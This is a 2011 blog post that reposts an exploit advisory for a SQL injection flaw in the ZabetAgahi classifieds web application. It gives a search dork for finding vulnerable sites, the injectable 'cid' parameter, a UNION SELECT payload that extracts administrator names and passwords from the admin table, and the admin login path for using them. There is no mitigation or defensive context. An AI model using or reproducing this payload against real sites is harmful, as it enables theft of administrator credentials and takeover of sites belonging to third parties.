WELCOME

for any suggestion's please mail to this id:

nanduriraja537@gmail.com,raja.mic539@gmail.com

Wednesday, May 25, 2011

ZabetAgahi SQLInjection Vulnerability


ZabetAgahi SQLInjection Vulnerability

#(+) Exploit Title: ZabetAgahi SQLInjection Vulnerability
#(+) Author : 3H34N
#(+) E-mail : Ehsan.Empire@Att.Net
#(+) dork : inurl:ZabetAgahiCategory.php?cid=
#(+) Versian : Gold Ver & Othder
#(+) Category : Web Apps [SQl]
#(+) My Home : http://Security-War.com and http://Black-HG.com
#(+) Platform : Tested on: linux-Windows
#(+) Download : http://www.zabet.ir/
_____________________________

The security problem in the file "ZabetAgahiCategory.php" has been created.

[~] Vulnerable File :

# [+]http://localhost.com/ZabetAgahiCategory.php?cid=[SQL]

# [+]-44 UNION SELECT 1,concat(admin_name,0x3a,pwd),3,4,5 FROM sbclassified_admin--


Note:login page is here http://localhost.com//AdminZabetAgahi/AdminZabetAgahiHome.php
Posted by at

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

LinkWithin

Related Posts Plugin for WordPress, Blogger...